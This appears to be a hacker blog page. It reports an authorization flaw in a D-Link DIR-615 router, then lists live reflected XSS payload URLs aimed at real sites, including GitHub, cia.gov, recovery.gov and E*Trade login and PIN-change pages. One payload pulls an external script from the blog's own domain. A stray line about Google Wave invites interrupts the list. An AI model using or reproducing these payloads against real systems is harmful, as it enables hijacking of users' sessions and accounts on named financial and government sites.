hiredhacker.com

D-Link’s DIR-615 Wireless N Router (http://www.dlink.com/products/?pid=565) contains a flaw that allows attackers to access administrative functions without authorization. By simply requesting a certain URL, this vulnerability can be used to perform numerous attacks including changing the admin password, disabling wireless security, and changing DNS settings.

The hole is confirmed in firmware version 3.10NA.

Example (changes admin password to ‘pwdpwd’):
Change password on 192.168.0.1

http://github.com/search?q=python&type=Everything&repo='"><script>alert(/pwned/)</script>

https://www.cia.gov/search?q="%20style%3d"position:absolute;top:-100px;left:-100px;width:10000px;height:10000px;z-index:999;"%20onmouseover%3d"alert(/pwn3d/)

http://www.recovery.gov/_layouts/1033/Recovery500.aspx?errorurl=<script>alert('and pwned again')</script>&error=<script>alert('pwned')</script>

More Google Wave invites, who wants em?

Most of these require the user to be logged in, and for those who don’t know, the ‘expression’ technique only works on IE. You will need to use a different method if you want to test it on other browsers. See Rsnakes cheat sheet for exmaples.

https://www.etrade.wallst.com/v1/stocks/snapshot/symbol_lookup.asp?textIn=%22%3E%3Cscript%20src=%22http://www.hiredhacker.com/xss.js%22%3E%3C/script%3E

https://us.etrade.com/e/t/accounts/changemyivrpin?FROM_PAGE=changemypasswords%22+style=%22width:expression(alert(/owned/))

https://express.etrade.com/e/t/applogic/OLAMasterpage2?SC=NPNK4KV%22+style=%22width:expression(alert(/owned/))

https://us.etrade.com/e/t/user/login?TYPE=&REALMOID=&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=&TARGET=%22+style=%22width:expression(alert(/owned/))

https://global.etrade.com/e/t/intl/page?nav=3&subnav=4&screen=1%27;alert(/owned/);//&language=en&country=gl

(nav and subnav are also vulnerable parameters)